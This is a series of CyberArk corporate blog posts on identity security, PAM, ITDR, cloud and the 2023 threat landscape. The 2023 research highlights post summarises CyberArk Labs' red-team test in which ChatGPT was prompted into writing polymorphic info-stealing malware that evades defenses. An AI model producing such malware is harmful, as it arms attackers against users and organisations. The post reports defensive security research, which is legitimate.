3. Centralized identity management. Use a centralized identity management system for user authentication and authorization, facilitating better control and monitoring of access across your cloud environment. Leveraging a centralized identity management platform that integrates with third-party IdPs ensures complete identity lifecycle management and identity compliance mapping.

4. Credential management. Regularly rotate and manage credentials securely, avoiding hard-coded credentials and utilizing Identity and Access Management (IAM) roles whenever possible. Integrating privileged access management (PAM) capabilities for long-term credentials helps safeguard them.

5. Audit trails and monitoring. Implement robust logging and monitoring for all identity-related events, enabling timely detection and response to security incidents. Leveraging cloud log solutions and cloud monitoring capabilities allows recording and monitoring of user activity within web applications and cloud consoles.

6. Automated compliance checks. Employ automated tools and processes to regularly assess and ensure compliance with security best practices, IAM policies and configurations. Regular reviews of inactive identities, identities with unused privilege permissions, and those with standing privilege permissions are essential.

7. Secure DevOps practices. Integrate security measures into the DevOps pipeline, ensuring that identity and access controls are considered and tested throughout the development lifecycle. Organizations should secure access to a broad range of applications, including COTS, BOTS, automation platforms and CI/CD tools – running in hybrid, cloud-native and containerized environments.

A Disciplined Approach for Taking Your Organization’s Cloud Health to the Next Level

Adhering to these guardrails, organizations can elevate the health of their cloud environments and take them to a higher level of maturity, optimizing their cloud solutions for security. Like my personal fitness journey conquering the EBC hike, a disciplined approach to cloud health requires discipline to reach peak performance.

An integrated identity security strategy, enforcing least privilege and enabling Zero Trust, is the best line of defense against attacks in today’s threat landscape. To explore our research, based on a survey of how 1,500 cybersecurity professionals are looking at securing the cloud as part of a holistic, risk-based identity security strategy for thwarting attacks and increasing cyber resilience, check out our Identity Security Model report.

Prashant Tyagi leads cloud solutions GTM (Go to Market) technology strategy at CyberArk.

]]>
GenAI’s Role in Upskilling to Close the Cybersecurity Skills Gap https://www.cyberark.com/blog/genais-role-in-upskilling-to-close-the-cybersecurity-skills-gap/ Thu, 25 Jan 2024 19:16:50 +0000 https://www.cyberark.com/?p=186670 Professional IT Technical Support Specialists and Software Programmer Working on Computers in Monitoring Control Room

The cybersecurity industry has a major people problem: it doesn’t have enough of them. The global shortage of more than 4 million cybersecurity workers isn’t a new phenomenon, but as digital and cloud initiatives accelerate, the effects are even more profound. This is especially true in the identity security domain. There aren’t enough skilled professionals to securely manage the ever-growing number of identities in the enterprise, and many teams lack specialized expertise in critical areas such as cloud security and Zero Trust architectures. This is, in part, why compromising identities remains the most effective way for cyberattackers to circumvent cyber defenses and access sensitive data and assets.

Reimagining the Classic Run-Grow-Transform (RGT) Model

Many organizations are turning to generative artificial intelligence (GenAI) and machine learning (ML) technologies to help bridge gaps, upskill existing teams, boost productivity through automation and improve their defensive strategies. When supported by robust processes and people practices, these technologies have the potential to optimize and elevate IT and security organizations at every step – from run (maintaining day-to-day business operations) to grow (scaling systems to support business evolution) to transform (implementing new systems and processes that drive new business value). Perhaps most importantly, GenAI and ML technologies can make cybersecurity an even more enticing career option by eliminating manual drudgery and emphasizing creativity, analytical thinking and other uniquely human characteristics.

Bridging Skills Gaps with GenAI and ML

GenAI and ML offer incredible promise for identity security areas such as policy optimization, risk reduction and threat detection – empowering teams to accomplish more with greater speed, increased accuracy and less manual work.

Take endpoint security policy creation, for example. Historically, experienced IT security professionals would spend hours sifting through alerts and creating policies based on these alerts. Before the policies could actually be enforced, they had to be tested manually, implemented without breaking the business and propagated to the organization. AI-powered policy creation is changing the game by delivering prescriptive policy recommendations within minutes. Teams can set these policies quickly and confidently for rapid risk reduction without manual analysis or senior-level (tier-3) analyst involvement. Of course, it’s important to test the outcome before moving to production, but an AI capability makes this a much easier task.

Security operations centers (SOCs) are harnessing ML algorithms to analyze vast amounts of identity-centric threat data in real-time and integrate it with security orchestration, automation and response (SOAR) systems to optimize response workflows. This can significantly reduce the workload on human analysts while driving down mean time to detection (MTTD) and mean time to response (MTTR) to improve overall security posture.

AI/ML can also give cybersecurity education a boost, helping to reduce the number of human-led security errors and incidents. AI-based user behavioral analytics (UBA) tools, for instance, help organizations analyze large datasets and identify patterns that could indicate risky user activities. By configuring security systems to alert on anomalies automatically, these organizations can quickly investigate potential issues and address risky habits or inadvertent slipups before they become problems.

Throughout my career, I’ve learned to take advantage of teachable moments like these, as a majority of people are very receptive to feedback and want to do the right, secure thing. With the appropriate training and support, employees outside of IT and security functions can become cybersecurity champions.

Investing in People to Elevate Security

One of the best cybersecurity investments an organization can make is in their people, empowering staff with the skills they need to navigate the evolving threat and regulatory landscapes, utilize emerging tools to enhance security measures and achieve their professional ambitions. Training doesn’t have to be a heavy lift. Simple actions can make a big difference, such as hosting a lunch-and-learn session for executive assistants – primary targets of many phishing campaigns – or sharing security guild insights.

Though the sky’s the limit with online education options in 2024, convenience and customization are key for busy cybersecurity professionals. Keep them informed of relevant upcoming training opportunities, such as online courses offered by a partner university, industry webinars or certification training. Incentivize upskilling and make learning a non-negotiable part of their work schedules. Otherwise, it may fall through the cracks.

Specialized training programs, such as the identity security courses offered through CyberArk University, can help supplement professional development curricula. By deepening their knowledge and technical abilities, team members can advance their professional goals and validate their expertise, increasing job satisfaction and retention.

The cybersecurity industry at large must continue to improve its approach to re-skilling workers and attracting new professionals to a field that needs them urgently. Recent data-backed research from ISC2 makes a compelling case for more open-minded hiring practices, diversity, equity and inclusion (DEI) and professional development reimbursement. As IT and security leaders, we must pay attention to such findings and act on them to move our industry forward – all while exemplifying optimism, cultivating trust and inspiring commitment.

Aligning with Business Processes to Effectively Manage Change

Enterprise IT environments are complex and hyper-connected – they’re not green fields. Newton’s Third Law often comes to mind in my work as a CIO, bringing me back to my university days as a physics major: for every action, there is an equal and opposite reaction. Introducing AI-powered technology (of any sort) into the mix can create a ripple effect of changes.

Each new tool must be implemented to correlate with existing processes, systems and policies. Understanding the new tool’s impact on, and interplay with, upstream resources (i.e., databases, microservices), downstream resources (i.e., logging and security monitoring tools) and entities (i.e., business users and service accounts) is critical. And ultimately, it comes down to Zero Trust.

AI/ML tools must also be optimized for your specific environment and use cases. It’s important to lean on vendor partners who can help fine-tune algorithms, adjust alert thresholds and streamline integrations with existing security infrastructure to meet organizational requirements. Once you’re up and running, establish feedback loops with your internal security teams and make continuous process improvements based on their hands-on experiences.

For the Love of the Game

GenAI and ML cannot replace cybersecurity’s critical human element. Still, with a focus on enablement and close business process alignment, these technologies can help bridge skills gaps, strengthen identity security programs and even reignite a passion for cybersecurity work. After all, the love of the game is why 73% of cybersecurity professionals say they joined this business to begin with.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Grossman on CyberArk’s Security Matters | CIO Connections page

]]>
Why Identity Security Requires More Than ITDR https://www.cyberark.com/blog/why-identity-security-requires-more-than-itdr/ Wed, 24 Jan 2024 06:44:09 +0000 https://www.cyberark.com/?p=186771 Guardian dog surrounded by sheep

Identity Threat Detection and Response (ITDR) is one of many aspects of an effective identity security program. Yet despite what some detection and response-focused vendors may argue, ITDR is not a silver-bullet solution to prevent identity-centric attacks. Such a thing doesn’t exist.

In fact, modern data breaches, industry analyst perspectives and compliance requirements make it crystal clear that organizations need more than ITDR to build an identity security program.

Today’s Attack Methods Circumvent ITDR Solutions

Major recent breaches highlight the value of proactive identity risk reduction. New identity-centric attack methods that bypass ITDR and other reactive controls are emerging. Agents on endpoints collect data for many ITDR systems, but without them, the systems cannot detect or respond to activity.

Take, for example, the September 2023 MGM breach. The Scattered Spider ransomware group behind the attack relied on stolen credentials but did not follow traditional methods of deploying malware on employee endpoints. Instead, the attackers used generative AI to voice phish (or ‘vish’) employees and help desk teams to provide their credentials and reset multi-factor authentication (MFA) settings.

Even with ITDR agents deployed on all endpoints, Scattered Spider could have still gained access. The attack specifically circumvented the endpoint, relying on social engineering in a medium (phone calls) where detection-focused security tools would not have visibility or context.

The same was the case with the October 2023 Okta Breach, where attackers first compromised the personal laptop of an Okta employee, knowing it was likely outside the estate covered by ITDR and other detection-focused technology. The attackers then found and used credentials for a corporate privileged service account in the password manager of the employee’s personal account.

This breach also illustrates the need for ITDR as part of the identity fabric. On the employee’s home laptop, the attackers found credentials for a privileged service account in the employee’s personal password manager. With a mature, integrated program spanning PAM and ITDR, the organization could not only have prevented the employee from seeing (and saving) the service account credentials but also detected anomalous or unauthorized use of the credentials and terminated the session.

To defend against modern attack methods, organizations need both proactive and reactive controls.

ITDR, Identity Security and Zero Trust

Take, for example, the core mantra of the Zero Trust philosophy – “Never Trust, Always Verify.” Organizations that rely on ITDR alone set themselves up to fail in both regards. ITDR can neither proactively reduce the attack surface (never trust) nor authenticate user connections (always verify).

Agent-based ITDR solutions also cannot often detect behavior beyond an identity’s endpoint – such as in web browser sessions to SaaS apps or a CLI session to an elastic cloud workload. Essentially, ITDR systems require integrations by default to detect or respond to attacks.

However – ITDR can help progress Zero Trust initiatives as part of a broader identity fabric. Through integration with privileged access management (PAM) and identity governance and administration (IGA) disciplines, ITDR adds a layer of defense-in-depth control to help organizations adopt the ‘assume breach’ mindset. ITDR also adds value to access management systems, authenticating end users in alignment with Zero Trust principles, helping organizations detect anomalous or risky activity – and denying access. ITDR capabilities from PAM solutions can also help detect privilege misuse, credential theft, and attempts to bypass PAM controls and workflows – without any agents.

In effect, ITDR can add value to Zero Trust initiatives through tight integration with existing identity security investments.

Analyst Perspectives: ITDR and the Identity Fabric

Industry analysts have long agreed on the need to secure identities with both proactive and reactive controls. In particular, many analysts cite the imperative for an interconnected identity fabric architecture that blends modular technologies to consistently enforce risk-aware, adaptive and resilient access controls – for both human and machine identities.

Operational efficiency is an essential element of the identity fabric concept. Analysts emphasize security teams should reduce complexity by focusing on IAM disciplines, not tools, and aiming to improve the composability of those disciplines. Mature ITDR disciplines can help realize this concept via data exchange with other disciplines like access management, PAM and IGA.

Of note, leading analysts emphasize identity fabrics are not synonymous with any single vendor’s suite of products; instead, the concept describes a proposed architecture of people, processes and technologies from different vendors that collectively provide defense-in-depth protection for all human and machine identities.

Compliance and Cyber Insurance Perspectives

Auditors and cyber insurers also offer clear recommendations to proactively reduce the identity attack surface. For example, compliance with frameworks like PCI DSS and AICPA SOC II requires adherence to proactive requirements like restricting access to sensitive systems and authenticating all connections.

The NIST Cybersecurity Framework is particularly clear in its guidance, specifying five core elements: Identify, protect, detect, respond and recover. Access control is the very first category of controls in NIST’s ‘protect’ phase, and NIST views proactive access control as foundational. The framework provides clear guidance to ensure:

  • PR.AC-1: Identities and credentials are managed for authorized devices and users”
  • PR.AC-3: Remote access is managed”
  • PR.AC-4: Access permissions are managed, incorporating the principles of least privilege and separation of duties”

Cyber insurance underwriters, who have direct ‘skin in the game’ when keeping clients secure, also recognize that phishing, ransomware and software supply chain attacks all rely on compromised identities and credentials. Not surprisingly, underwriters look for proof an organization is both proactively and reactively reducing the risk of identity compromise.

Examples of common cyber insurance requirements include:

  • Taking endpoint security past endpoint detection and response (EDR/XDR) by proactively removing local admin credentials from employee workstations and servers.
  • Enforcing MFA to verify use of administrative privileges.
  • Securely managing and rotating credentials for highly privileged accounts and machine identities like service accounts.
  • Isolating usage of privileged accounts to prevent lateral movement.
  • Extending privileged access management controls to third-party vendors.

Beware of Wolves in Sheep’s Clothing: ITDR Vendor Claims to Watch Out For

Some ITDR vendors continue to market their capabilities as superior to PAM, access management and IGA, despite the consensus recommendation for both proactive and reactive identity security controls.

In particular, certain ITDR-focused vendors have communicated that PAM solutions are insufficient – even releasing misleading claims, like the ones illustrated in the “ITDR Vendor Claim” column in the chart below (yes, they are actual vendor claims, which we’ve reworded, in an effort not to directly call out the vendor). For clarity, we’ve includedan analysis of where each discipline adds value to an identity security program in the right column (“Identity Security Reality”).

Chart illustrating ITDR vendor claims versus identity security reality across categories.

CyberArk believes security is a team game, which is why we aren’t singling out the vendor behind the claims in the table’s left column. But you should evaluate baseless claims that any one vendor can ‘do it all’ with caution. Understand that to truly reduce risk, your identity security program needs both proactive and reactive controls.

TL;DR: You Need More Than ITDR to Secure Your Organization’s Identities

ITDR does not replace widely recommended security disciplines like access management, PAM and IGA. Rather, ITDR can add value and help make Zero Trust a reality through tight integration with these disciplines in an identity fabric model.

Want to learn more about the connection between identity security and Zero Trust? Check out our whitepaper on Guiding Your Leadership Team Through the Zero Trust Mindset.

Sam Flaster is a director of product marketing at CyberArk.

]]>
3 Things About 2023’s Threat Landscape That Shapes My 2024 CIO POV https://www.cyberark.com/blog/3-things-about-2023s-threat-landscape-that-shapes-my-2024-cio-pov/ Wed, 17 Jan 2024 16:26:08 +0000 https://www.cyberark.com/?p=186689

2023 was a tumultuous year that drove technology transformations at a pace unknown. The industry saw an accelerated and unrivaled pace of technology adoption, persistent yet evolving challenges and unparalleled market dynamics around the world.

The following are the top three trends from last year that influenced my thinking as a CIO at the top of 2024:

1. Software Supply Chain: The Root Cause of 2023’s Notable Breaches

2023 saw the industry’s first double supply chain attack that spotlighted third- and, particularly, fourth-party suppliers as a potent threat vector.

Take, for example, the massive compromise of 3CX – a VOIP and teleconferencing provider – who was Trojanized, unfolding multi-staged attacks against users in early 2023. According to Mandiant, this was the first double supply chain attack that the industry had likely seen, impacting a large portion of over 600,000 customers. In mid-2023, the exploitation of file transfer software MOVEit, leading to ransomware, was yet another instance of a software supply chain attack. Several impacted organizations were suppliers or vendors to other organizations, causing downstream impact to organizations large and small, as well as U.S. and French government agencies.

2. GenAI’s Hype Cycle and Adoption

In less than a year of its launch, ChatGPT hit 100 million weekly users, and over 2 million developers are currently building on the company’s API, including the majority of Fortune 500 companies. As a technologist, I find this exciting but troubling at the same time.

It’s an exciting time to harness the potential of AI to advance, yet navigating AI’s Wild West is challenging. With no playbook or precedent to follow, technologists and cybersecurity professionals must skillfully navigate the potential and real-world secure applications of GenAI. While GenAI is expected to boost productivity and innovation, fearmongers warned early on that bad actors would use it for nefarious purposes. Underscoring this concern, in January 2023, CyberArk Labs published a blog based on their research, proving that ChatGPT could produce sophisticated polymorphic malware with the right prompts.

To tackle these issues head-on, the U.S. issued an executive order on AI, and the EU introduced the AI Act in 2023 to help enforce best practices and regulatory frameworks.

3.Global Political and Economic Uncertainty

Last year was also marred by geopolitical conflict in different parts of the world, resulting in several attempted attacks on critical infrastructure and supplier ecosystems. According to the World Economic Forum, in 2024, 90% and 79% of its chief economists expect geopolitics and domestic politics to be sources of volatility in the global economy, respectively. With several armed conflicts likely to continue well into the new year and three of the world’s five largest economies (U.S., India, and U.K.) heading for national elections, there is no doubt in my mind that attacks on critical infrastructure and, in turn, on technology vendors will amplify around the globe.

I expect complexities to rise as the lines between nation-state actors and cybercriminals blur and there is a steady shift in the intent of attacks from espionage to sabotage.

My Outlook for 2024

2024 will be a cat-and-mouse game between cybersecurity teams and bad actors in a politically charged world. I expect relentless social engineering attacks, attempts to cripple critical infrastructure, exploitation of the supply chain and every other possible vulnerability to rise multi-fold.

In 2024, to protect your organization, you’ll need to:

  • Periodically evaluate your vendors’ security capabilities. Your vendors’ ability to secure their products and services will ensure your organization can stay secure and confidently conduct business. Given the heavy reliance on third-party SaaS solutions, 98% of organizations have a relationship with a vendor that experienced a data breach within the last two years. Your organization may be one of them; therefore, it’s important to leave no stone unturned to boost your defenses. Also, pay special attention to end-of-life products that are still in use and secure them.
  • Remember that the definition of AI systems is not limited to GenAI. AI systems include GenAI along with systems using neural networks and tools built over several years. In 2024, it is essential to evaluate, secure and manage all systems – both old and new. You should consider contractual agreements that periodically allow you to review your suppliers’ risk-based governance and risk management policy for all products and systems using AI in any capacity. This practice should include provisions for any information-sharing on relevant audit trails, reviews, bias and fairness in decision-making, data retention, etc.
  • Go back to the basics and do them right. Focus on improving employee training, organizational security hygiene, round-the-clock threat detection and response, upskilling cybersecurity skills and adopting automation and artificial intelligence.
  • Implement a robust Zero Trust strategy. If you have not started your journey to Zero Trust, wait no more. Start Now. On the other hand, if you have already implemented a Zero Trust strategy, evaluate and iterate your strategy against the backdrop of any changing environments. Remember, comprehensive security means implementing a Zero Trust strategy throughout the entire identity lifecycle.
  • Treat your people as the greatest asset, not the weakest link. We can have all the tools in the world to protect our organization, but the most valuable assets are the people – cybersecurity experts, employees, contractors, and partners, among many others. Be sure to treasure, train and nurture them. At the end of the day, it’s all about the people.

Finally, as a CIO and a technology leader, I recommend that you take a step back and find your balance and scale, but do not rush as you grapple with these new issues.

In 2024, I plan to share my thoughts and recommendations with you on a regular basis. In the upcoming blogs, I will discuss several important issues, including the right balance between upskilling cybersecurity talent and adopting AI tools, best practices to maintain privacy and managing cloud complexities. I hope you’ll find it helpful in your journey to protect your organization.

Happy 2024 to all of you.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Grossman on CyberArk’s Security Matters | CIO Connections page

]]>
Securing High-Risk Access with Reimagined PAM Controls: A Customer Story https://www.cyberark.com/blog/securing-high-risk-access-with-reimagined-pam-controls-a-customer-story/ Tue, 09 Jan 2024 16:32:55 +0000 https://www.cyberark.com/?p=186113

My team and I were on a call with a customer who saw a critical need to secure access to his company’s cloud service provider (CSP) containers. Our conversation comes to mind often, because it reflects the fast-evolving nature of privileged access and what it takes to secure it in today’s complex IT environment.

As we spoke, the customer stood out to me as a forward-thinking leader. His job: protect and enable an enterprise that is no stranger to the cloud. While more than eight in 10 IT leaders are adopting a hybrid cloud environment, this customer’s company was born there. Our job: help him finalize an integrated set of solutions and controls to protect his CSPs.

Our discussion about applying zero standing privileges, or ZSP, to cloud power users – was capturing everyone’s imagination and attention, even my own (and I talk about these things quite a bit). Why? Consider what’s at stake. The risk of having standing access to highly privileged administrative roles is too high. Attackers who compromise cloud users’ identities can disrupt operations, steal data and more.

With ZSP, users are elevated just-in-time (JIT), with only the entitlements necessary for the task at hand. In turn, ZSP enables security teams to secure their cloud environments by:

  • Reducing the risk of credential theft by preventing standing access.
  • Enforcing real-time least privilege in the cloud by granting only the relevant permissions a user needs – and only when needed – for a given task.
  • In turn, lessening the potential impact of an account takeover; an attacker’s options are extremely limited without admin-level access.

PAM’s Essential, Foundational Role Goes Next-Gen

As we dug deeper into how we could help our customer with contemporary use cases – like securing access for cloud engineers and non-human identities – we still needed to talk about the essential role of foundational privileged access management (PAM) controls. Because whether you’re a 100-year-old corporation migrating to the cloud, or a 1-year-old startup native to the cloud, you face a set of constants:

  • Your organization has privileged users, accounts and credentials.
  • Attackers will try to compromise these users’ identities, move laterally and elevate privileges.
  • These users, including IT admins of all types, require fierce protection.

Considering those constants, we wouldn’t be doing our jobs if we didn’t ask the question: “Have you thought about the need for fundamental PAM controls like securely storing and rotating the credentials of highly privileged users?”

The response: Crickets. At first.

Some key “ah-ha moments” arose as we continued exploring our customer’s challenges. For example, securing privileged credentials actually transcends both PAM’s well-established and next-gen eras. It’s a key example of a PAM mainstay that can and should be reimagined, to secure a broad range of high-risk users.

Think about the textbook-definition privileged IT users that companies’ PAM programs have focused on for years – like Linux admins who use SSH keys to access their organizations’ systems. The risk we’ve all seen, time and time again: these admins often store their credentials locally on workstations, where attackers can easily find them.

But you know who else does this? Cloud developers.

Redefining PAM for Today’s and Tomorrow’s Threats

Similar to traditional IT admins, it’s common for cloud developers to download an SSH key from a console, save it on their workstations and use it to log into an Amazon EC2 instance in their organization’s cloud environments. Why? The need for speed leads to risky actions. Regardless of their job descriptions, power users in the cloud are bound by urgency. This is true for:

  • Architects under deadline pressure to complete lift-and-shift migrations.
  • Developers collaborating in the cloud to continuously build and maintain apps.
  • On-call engineers ready to fix any cloud outages that would impact application users.

Enterprises know that every new service rolled out by CSPs comes with a host of new roles and entitlements – with which their existing identity and access management controls are often incompatible. To avoid the problem, they simply give cloud users far more entitlements than they’d ever need – in the name of speed and convenience.

The result: identities are over-permissioned beyond what their roles require and often have powerful standing access. Threat actors know all of this – to the point that the National Security Agency (NSA) suggests misconfigurations are the most common and easiest entry point into cloud environments for attackers.

And like many security leaders, our customer knew it too.

By the time the conversation wrapped up, he was keen to incorporate a balance of reimagined PAM controls like ZSP and time-tested PAM fundamentals into his plan – to the point where he asked: “Why wouldn’t we apply these controls to securing our users’ credentials?” His question applied not only to his cloud users, but to the traditional IT admin roles found within any enterprise of any size, industry or cloud maturity. Because he knew that securing identities in a fast-changing field like PAM means keeping an eye toward the future, while never forgetting the fundamentals.

What One Security Leader’s Story Can Teach Us About PAM’s Evolution

Today’s PAM programs face an increasingly vast and dynamic threat landscape, upended by innovation and reshaped by new identities, environments and attack methods.

Technology shifts have allowed organizations to delegate powerful access to anyone or anything. Any human identity can gain high-risk access, from admins and vendors to cloud engineers and developers. Even the day-to-day business user can now perform admin-level tasks in their domain. The same goes for non-human identities, including automation accounts found in manufacturers’ operational technologies. Moreover, privilege moves with IT. While IT will always exist on-premises, privilege is increasingly in the cloud.

threat landscape PAM

In times like these, PAM is more important than ever – and should be as consistent and dynamic as privilege itself. Organizations will always need foundational PAM. At the same time, IT security teams need to reimagine their PAM programs. Nearly all (99%) security decision-makers say they’ll face an identity-related compromise in the year ahead – with the number-one reason being transformational initiatives like cloud migrations.

Securing Privileged Access in Transformative Times

In a new perspectives piece, I explore two use cases requiring a mix of time-tested principles and innovative new controls.

  • The first area is privileged access in cloud environments – we only scratched the surface here regarding the risks and how to secure access for not only human but also non-human identities. Only 25% of security leaders say they secure sensitive access to bots and robotic process automation (RPA) that are integral to cloud-based development – we’ll talk more about how to solve problems like these.
  • The second area is operational technology (OT). About 70% of business leaders who’ve invested in securing OT (which includes devices, machinery and systems used in sectors such as manufacturing, energy and healthcare) face implementation challenges. And the stakes are high, especially in critical infrastructure sectors where an OT attack can jeopardize critical services that society relies on. We’ll share best practices on that, as well.

For further insights on today’s fast-changing threat landscape and what it takes to protect your organization, check out Barak Feldman’s viewpoints piece, “Securing Privileged Access in Transformative Times.”

Barak Feldman is senior vice president of privileged access management (PAM) and identity security at CyberArk.

]]>
CyberArk Labs’ 2023 Threat Research Highlights https://www.cyberark.com/blog/cyberark-labs-2023-threat-research-highlights/ Tue, 02 Jan 2024 15:00:09 +0000 https://www.cyberark.com/?p=185937 Keyboard image with code overlay to accompany CyberArk Labs threat research 2023 year in review blog post.

Throughout an eventful 2023, CyberArk Labs remained focused on uncovering emerging cyberattack patterns and producing threat research aimed at helping organizations strengthen their identity security defenses.

We covered a lot of ground this year and had the opportunity to share our findings at events around the world. Today, we’re revisiting some notable threat research projects from 2023:

Chatting Our Way Into Creating a Polymorphic Malware

AI-enabled threats were top-of-mind for security professionals this year – with good reason. CyberArk Labs began experimenting with ChatGPT in its earliest public days to see how attackers might try to use it, starting with polymorphic malware generation. We asked ChatGPT to create an info-stealer, which it delivered after making some major security snafus along the way, such as hardcoding credentials. Ultimately, we found that attackers can use AI-generated polymorphic malware to evade defenses. For example, an attacker could use ChatGPT to generate (and continuously mutate) information-stealing code for injection. By infecting an endpoint device and targeting identities – locally stored session cookies, in our research – they could impersonate the device user, bypass security defenses and access target systems without detection. We expect that automated identity-based attacks like these will become even more prevalent as AI models improve.

Read the full research.

The (Not so) Secret War on Discord

Cybercrime groups are increasingly using legitimate resources – from publicly available repositories to enterprise software applications – for their own nefarious purposes. This spring, CyberArk Labs discovered a new malware strain distributed over Discord, a popular chat service loved by developers and used by hundreds of millions of people around the world. Dubbed Vare, the malware uses Discord for dual purposes: for targeting new malware operators via social engineering and as an infrastructure for data exfiltration. Our team’s research exposed the group behind the malware, their attack methods and their potential motivations. Most important, we emphasized caution, as any corporate developer using Discord could potentially put their organization at risk if their endpoint is infected with the Vare malware.

Read the full research.

White Phoenix: Beating Intermittent Encryption

Ransomware actors can significantly speed up their attacks by encrypting just enough data to make files useless (but not all of it). Our team set out to combat this “intermittent encryption” method used by BlackCat and other large ransomware groups. The result was White Phoenix: an open-source ransomware recovery tool that allows victim organizations to recover files encrypted by ransomware strains that use intermittent encryption. White Phoenix supports PDFs, Microsoft Office documents and zip files. But other formats, such as video and audio files, may also be recoverable. We welcome continued community contributions to enhance the tool and improve ransomware protection for all.

Read the full research and explore the free tool.

Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation

Docker is one of – it not the – most-used developer tool in the world today, which makes it an interesting threat research subject. But in this case, Docker wasn’t even on our radar until a CyberArk Labs researcher installed Docker Desktop (the primary Windows service for Docker) as part of unrelated Windows containers research. He observed the service’s various privileged processes communicating with each other via named pipes, which can be risky. Our resulting research found that Docker uses a named pipe with REST API that allowed us to call its methods from a low-privilege user, with the actions done by a privileged service. This enabled us to impersonate the Docker Desktop Service account (SYSTEM) and execute arbitrary system commands with the highest-level privileges. We ultimately discovered six privilege escalation vulnerabilities in Docker Desktop by hunting through a massive maze of pipes, and developed an open source tool named “PipeViewer” to help scan for Windows named pipes and show their permissions.

Read part one and part two of this research and explore the open-source tool.

Explore CyberArk Labs’ Full Threat Research Library

These highlights offer just a glimpse into the many important projects CyberArk Labs worked on over the last 12 months. We invite you to explore the CyberArk Threat Research Blog, where among other topics, you’ll learn how we:

You can also read our 2024 cybersecurity predictions for our team’s perspectives on what’s to come in the year ahead.

Lavi Lazarovitz is CyberArk Labs’ Vice President of Cyber Research.

]]>
Secure Identities With These Five Intelligent Privilege Controls https://www.cyberark.com/blog/secure-identities-with-these-five-intelligent-privilege-controls/ Thu, 21 Dec 2023 17:04:38 +0000 https://www.cyberark.com/?p=143935 identities-intelligent-privilege-controls

If you’re reading this, a major part of your job is making the case for security-related issues that you know are urgent.

You may be among the 97% of CISOs being asked to present to their boards — briefing them on new attack methods and recommending protective solutions. Or you might be a security admin preparing to relay that same information to your CISO. Either way, you’re on point to convince key stakeholders that:

  • These threats require attention.
  • Your plan merits support.
  • The time for action is now.

Why now? IT security teams face pressure to act quickly when threats emerge and scrutiny rises. The consequences of delayed action loom large. For example, what if you don’t move quickly enough to find a vendor whose solution can protect against the latest threat? No doubt this is a valid concern — but it could also be why two-thirds of organizations use security tools from up to 40 different vendors.

The trouble is when security solutions are bolted together in haste, they typically cannot:

  • Share data on potential threats and turn insights into action as a unified front.
  • Correlate alerts across data to find the signal in the noise.
  • Extend an effective control for securing one type of identity (IT admin) to another identity (everyday employee).

Your organization likely has a solution for securing highly privileged IT users’ identities. And you probably have tools to authenticate employees who use business applications. All good things! However, in a typical organization, these solutions are often siloed. So, if you happen to notice that a control from the privileged access management side (like session monitoring) could also be useful for securing identities across your workforce — well, that’s a spot-on observation.

But without integration, your solutions can’t share controls, nor can they provide the visibility you need — be it into users’ access or into potential threats — in a unified way. Let’s talk about how you can change that.

The Role of Intelligent Privilege Controls

You’re protecting the enterprise at a time when three realities — new identities, new environments and new attack methods — are making the job more complex than ever. This dynamic calls for extending intelligent privilege controls to all identities, from IT users and everyday employees to developers and non-human identities.

Any identity can become privileged based on the sensitive resources they can access — and the actions they can take. Consider the example of a healthcare system, where a wide range of identities (human and non-human) requires protection, including:

  • IT admin identities with high-risk access to critical healthcare infrastructure.
  • Everyday hospital employees, 65% of whom have access to sensitive data such as patient records and billing information.
  • Automated tools used by the hospital’s DevOps team to build out cloud operations as healthcare modernizes.
  • Built-in identities on endpoints and servers that an attacker could use to steal patient data or install ransomware that could shut down hospital operations.
  • Machine identities built into healthcare Internet of Things (IoT) devices used by medical staff and patients.

Healthcare is just one example. This phenomenon — in which identities of all types are gaining access to critical resources, infrastructure and environments — is happening across all industries and government sectors.

What we’re seeing is an evolution of privilege beyond the textbook definition. Any identity can become privileged based on what it can access — and what actions it can take. This is why a converged identity security approach is so essential.

In an identity security approach, the underlying solutions are designed to share data, benefit from each other’s respective controls and — similar to the people who are instrumental to making identity security work — collaborate with each other. With intelligent privilege controls at the center of that approach, you can enforce least privilege across all of your identities, infrastructures, applications, endpoints and environments.

Five Types of Intelligent Privilege Controls to Secure Your Organization’s Identities

At this point, you might be thinking to yourself, “Okay I get the general premise here. But what kinds of controls are we talking about exactly, and what kinds of identities would I apply them to?”

Let’s break it down. We created a helpful list you can refer to when building or refining your own identity security approach. It can also be useful when you’re making the case to your stakeholders — from your board to your team — on how to better secure your organization at a time when all types of identities are under attack.

Graphic listing the five intelligent privilege controls, along with detailed descriptions of each control. The five intelligent privilege controls are: 1. Zero standing privilege (ZSP) and just-in-time (JIT) access; 2. Session isolation; 3. Session recording and protection; 4. Endpoint least privilege; 5. Credentials and secrets management.

As detailed, intelligent privilege controls aren’t just for the IT admins of world. They can help you secure the entire ecosystem of identities driving your organization’s most important initiatives.

Finding a True Identity Security Platform: How to Vet Providers

So where can you find a platform in which the underlying controls can be applied to any identity with access to potential targets? Could it be as simple as consolidating providers? Not quite. The word “consolidation” doesn’t do justice to the challenge at hand. We’re talking about building something bigger that can take on a threat landscape in which:

  • 84% of organizations experienced an identity-related breach in the past year.
  • 62% of IT security decision-makers say their organizations lack a complete picture of human and non-human access to sensitive resources.
  • 63% say their processes and technologies do not adequately secure the highest-sensitivity access for employees.

Today’s threats require an identity security platform that’s integrated in every way — built to protect every identity (human and machine) and every resource they touch, across every one of your environments. The million-dollar question is: how can you find such a platform? We’ve got you covered on that front as well.

Check out our recently published eBook, “Buyer’s Guide: What to Look for in an Identity Security Platform.” It’s a quick read containing vendor-agnostic recommendations on the strategies, controls and technologies that comprise a true identity security platform. In the guide, you’ll find insights on what questions to ask and how to evaluate providers’ offerings to make sure they can meet your organization’s needs.

You can also watch our on-demand webinar, “Top Considerations for Identity Security Platforms.

Amy Blackshaw is vice president of product marketing at CyberArk.

]]>
Why Intelligent Privilege Controls Are Essential for Identity Security https://www.cyberark.com/blog/why-intelligent-privilege-controls-are-essential-for-identity-security/ Fri, 15 Dec 2023 19:18:58 +0000 https://www.cyberark.com/?p=185219 identity security intelligent privilege controls

 “If we can control identity, we can stop most modern attacks. And if you control identity, then you control every perimeter, application, container – effectively every part of the environment.” – Brian Miller, CISO at Healthfirst

Organizations are experiencing explosive growth in identities – both machine and human. This includes machine identities such as applications and workflows, which now outnumber human identities 45:1. With new norms such as hybrid work, new environments like hybrid cloud and the continuous flow of rapid innovation, the reality is that organizations are facing a constant onslaught of identity-related attacks like ransomware and phishing.

The solution for getting a handle on the chaos? Identity security.

